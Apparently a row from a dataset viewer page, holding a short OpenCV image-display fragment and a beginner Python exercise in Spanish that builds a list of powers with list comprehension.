img1 = RE(img.copy())
cv2.imshow("test", img1)
cv2.waitKey(1000)
|
#Define a fuction
#input
# num, iterable(tuple, list) containing numbers as args
#to power(3,*args)
# example nums=[1,2,3]
# output list [1,8,27]
#if user didn't pass any args then give a user a message 'hey yo didn't pass
#args
#else
#return list
# NOTE: USE list comprehension
num=int(input("Ingrese el exponente: "))
numeros=int(input("Ingrese hasta que numero va a calcular las potencias: "))
lista=[i for i in range(1,numeros+1)]
def to_power(num,*lista):
if lista:
potencias=[i**num for i in lista]
return potencias
else:
return "Hey didn't pass args"
print(to_power(num,*lista))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.